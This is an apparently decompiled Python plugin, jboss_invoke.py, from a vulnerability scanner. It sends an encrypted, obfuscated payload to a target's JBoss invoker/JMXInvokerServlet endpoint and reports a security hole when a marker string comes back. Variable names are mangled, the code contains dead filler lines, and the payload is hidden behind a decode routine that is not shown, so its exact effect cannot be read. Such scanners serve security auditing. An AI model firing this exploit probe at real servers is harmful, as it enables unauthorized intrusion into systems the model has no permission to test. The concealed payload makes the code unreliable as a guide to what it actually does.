#Embedded file name: jboss_invoke.py
import urlparse
import urllib2

def assign(service, arg):
    if service != '''www''':
        return
    else:
        oo000 = urlparse.urlparse(arg)
        return (True, '''%s://%s/''' % (oo000.scheme, oo000.netloc))
    if 0:
        Ii.o0o00Oo0O - iI11I1II1I1I


def audit(arg):
    oooo = arg + '''invoker/JMXInvokerServlet'''
    iIIii1IIi = decode('\x17\xa0\x878\x89\xc6\\\xc8\xf2\xc9$\xc4\xff/\xb0a;\x8c\xcdq\xa7\xc8L\x0e\x9f;\xaf6\xe9*\xd2e\xc8%\xe6Q\x96\xd18\xa8\xf3\xcd,\x89\xf49\xb6}&T\xa2\x8a\xf6\xe6\x11\xcbU^\xc0X\xbf\x17\xc3`\xb3\xda\xd6p\'`v\xa32\xc81\xea\x84\'\xbed)\x8c\xc8~\xbf\xc0\x01&\x85&\xa5?\xa2\x15\xa1\xf5\x1b\xe9p\xbc}\x8c^\xe1\x9c\xf2C\xef\xe3,\xb3g-\xda\xd6\x1f\xc1\xcdN\x19\x8a|\xac9\xa9\x00\x9dY\xce \xe5X\x882\xf0t\x80\xb0\xd7\n\x1eO\xdf\x120\xd2\x82\x8ao\xad\\\x1d\xebv\xaf*\xa0I\xd9u\xd4>\xf4\x13\x93\xda*\x8e\xfe\xda7\x83\xfa#\xf1_)\xd0\xd7w\xb0\xcbC\n\x8f\x04\xa14\xb2\x02Y\xdb[\x9csw*-P\xe1\x9d\xc33\x9d\x18M\xdf\x12\xcd\x0eI\x1f\xd4\xd2]o\xf8\t\x8c2\xa6\x11\xd29\xd7,\xe9Z\xd4\xfb>\x8b\xf8\xd87\xd1\x05\x83\x87\x8dX\xd1\x8ds\xd3\xa7/\x17\x9bR\xc0X\xc5\x14\xc1\x17\xa0\'\xe6K\x9b\xccr\x8c\xfc\xd5"\x8d\xf0 \xba|<\x8c\xeb}\xbb\xc2L\x1b\xa53\xad=\xc8d\x14\x0cP \x92\xf2\xf9\xb4\\\x99\xed\xcfC\xf6\xff/\xb0a;\x8c\xd7f\xa2\xd3J\x02\xd1&\xb9(\xa2Z\xe0r\xc9;\xe2O\xb3\xda:\x8e\xe5\xcfC\xe0\xdf,\xa9s\x1e\xef\xea~\xbc\xc2%\x81\xe9D\xb8/\xc3g\xb3\x17\xba>\xf5=\xd8\xdb.\x86\xb3\xd1!\x85\xe6>\xf1{&\xd4\xcb|\xb0\xd3F\x00\x85|\x896\xb1\x08\xd0v\xcf$\xe8S\xb1\xd1%Yf\xc9\xc7=\x06\xc8&\x10H\xa3\xed\x1f\xd6\xc8]\x0b\x82<\xa14\xbf\x17\xb3\x17\xbbH\xf4L\xfa\xca\\\xe4\xea\xb6C\xea\x95Hs\xffH\xa7\xd4\xe4\x86\x00\x85\x17\x9cV\xc0X\xc7e\xc0f\xbb3\x87:\xfa\xb4\\\xeb\xed\xc82\xea\xebM\xd8\x12H\xa2\xa0l\xa3\xa7\x0c\x00\x995\xee2\xa5\x08\xc0d\x95$\xe9K\x95\xd7=\x95\xf4\xd4-\xc4\xdc#\xa9}+\xc3\xd0v\xbe\xc9{\x16\x9b7\x99\xff\xfd{\x16<\xc7\xf2\x85=\xfb\xfd\\\xe6\xf2\xc9\'\x83\xfb,\xb3j8\xa2\xa4\x1f\xd0\xdf')
    try:
        o0OO00 = urllib2.Request(oooo, iIIii1IIi)
        oo = urllib2.urlopen(o0OO00).read()
        if decode('\xf1,\xf1\\\xda\xfc3\x95\xce\xcb,\x9e') in oo:
            security_hole(oooo)
    except:
        if 0:
            oO0OooOoO * o0Oo


if __name__ == '__main__':
    from dummy import *

#KEY---bb4d873dfab45ce19dbb43ea954ddf1248a2a41fd1a72f6feb52c058c767b317---